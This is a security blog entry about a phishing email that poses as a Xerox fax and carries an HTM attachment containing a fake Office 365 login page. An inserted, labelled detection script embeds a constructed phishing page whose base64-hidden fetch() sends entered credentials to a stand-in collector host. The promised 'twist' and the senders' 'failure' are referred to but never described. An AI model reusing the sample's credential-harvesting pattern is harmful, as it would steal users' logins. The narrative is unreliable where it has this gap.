Last Updated: 2022-01-18 09:10:26 UTC
by Jan Kopriva (Version: 1)
Authors of phishing and malspam messages like to use various techniques to make their creations appear as legitimate as possible in the eyes of the recipients. To this end, they often try to make their messages look like reports generated by security tools, responses to previous communication initiated by the recipient, or instructions from someone at the recipient's organization, just to name a few. Most such techniques have been with us for a long time. Last week, however, I came across one that I don't believe I've ever seen before – the inclusion of what may be thought of as an advertisement in the body of the message.
Although it may sound strange, the inclusion did make at least some sort of sense. The message was supposed to look like a notification about a new “fax” sent by a Xerox scanner, and its footer – which was slightly reminiscent of ads displayed by Google in search results – included links and text related to Xerox solutions.
One can only guess at whether this addition makes the message more or less believable to a regular user, but it is certainly unusual… However, it wasn’t the only slightly atypical thing about the e-mail.
As you may see in the image above, the message carried an HTM attachment. This contained an entire fake Office 365 login page; the only external resource it loaded was the O365 logo.
This technique, in which phishers place an entire fake login page in an attachment that only initiates communication with external infrastructure once a victim clicks the "log in" button, has been with us for a while now. It certainly has its advantages from the point of view of the attackers: the message body carries no link for URL-reputation filters to inspect, the page renders locally from the file without any hosted infrastructure, and the phishing site is contacted only at the moment credentials are submitted. This time, however, there was a slight twist to it.
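The following is an added example, not code from the diary or its author, showing how a triage script can flag the attachment pattern described above: an HTML file that contains a password field, renders offline, pulls at most a logo from a remote host, and only submits to external infrastructure when the form is sent. The sample page, the host names (RFC 2606 reserved `.test` and `.invalid` domains) and the field names are all constructed for illustration; the real attachment is not reproduced here. It also handles one evasion a practitioner will meet on such attachments, which the diary does not mention: a submission URL wrapped in `atob("...")` so that a plain URL grep over the file finds nothing.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (hypothetical; not the attachment from the diary): a
# self-contained "sign in" page that renders entirely offline, fetches only a
# logo remotely, and contacts the collector only once the form is submitted.
# The fetch() target is base64-wrapped in atob() to dodge a plain URL grep.
HIDDEN_URL_B64 = base64.b64encode(b"https://collector.example.invalid/api/login").decode()
SAMPLE_HTM = """<!DOCTYPE html>
<html><head><title>Sign in to your account</title></head><body>
<img src="https://logo-cdn.example.test/o365.png" alt="Office 365">
<form id="login" method="post" action="https://collector.example.invalid/post.php">
  <input type="email" name="loginfmt" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  fetch(atob("__B64__"), {method: "POST", body: new FormData(this)});
});
</script></body></html>""".replace("__B64__", HIDDEN_URL_B64)

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


class _Collector(HTMLParser):
    """Gather form actions, inputs, remote resources and inline script text."""

    def __init__(self):
        super().__init__()
        self.forms, self.inputs, self.resources, self.scripts = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag in ("img", "script", "link", "iframe"):
            url = a.get("src") or a.get("href")
            if url:
                self.resources.append(url)
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _host(url):
    return urlparse(url.strip()).netloc.lower()


def _collect(html, depth):
    """Return (password field names, submission hosts, resource hosts) for one stage."""
    c = _Collector()
    c.feed(html)
    passwords = [name for kind, name in c.inputs if kind == "password"]
    exfil = {_host(a) for a in c.forms if _host(a)}
    resources = {_host(u) for u in c.resources if _host(u)}
    script = "\n".join(c.scripts)
    exfil |= {_host(u) for u in URL_RE.findall(script)}
    # Unwrap atob("...") literals: a base64-encoded URL, or a whole second-stage
    # page written via document.write(), hides its host from the regex above.
    for blob in ATOB_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        exfil |= {_host(u) for u in URL_RE.findall(text)}
        if depth < 2 and "<" in text:  # decoded stage is itself HTML: analyze it too
            p, e, r = _collect(text, depth + 1)
            passwords, exfil, resources = passwords + p, exfil | e, resources | r
    return passwords, exfil, resources


def analyze_attachment(html):
    """Score an HTML attachment for the self-contained-login-page pattern."""
    passwords, exfil, resources = _collect(html, 0)
    indicators = []
    if passwords:
        indicators.append("password input(s): " + ", ".join(passwords))
    if exfil:
        indicators.append("submits to external host(s): " + ", ".join(sorted(exfil)))
    if resources:
        indicators.append("loads remote resource(s) from: " + ", ".join(sorted(resources)))
    # A password field plus any outbound submission target is the core pattern.
    verdict = "likely credential phishing" if passwords and exfil else "needs review"
    return {"verdict": verdict, "indicators": indicators,
            "exfil_hosts": sorted(exfil), "resource_hosts": sorted(resources)}


if __name__ == "__main__":
    print(analyze_attachment(SAMPLE_HTM))
```

Run against a real attachment with `analyze_attachment(open("attachment.htm", encoding="utf-8", errors="replace").read())`. The hosts it reports are the ones worth blocking or pivoting on, since the message itself contains no URL; a page whose form action is relative and whose script builds the target at runtime from string pieces will still slip past this static pass and needs to be opened in an instrumented browser or sandbox instead.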
Although – given what we just mentioned – one can hardly call the phishing attempt sophisticated, the unusual inclusion of advertisement-like content in the body of the e-mail did, at least, make it somewhat interesting. And, hopefully, the slight failure on the part of its senders made it less likely to actually make it to recipients' inboxes and cause any harm.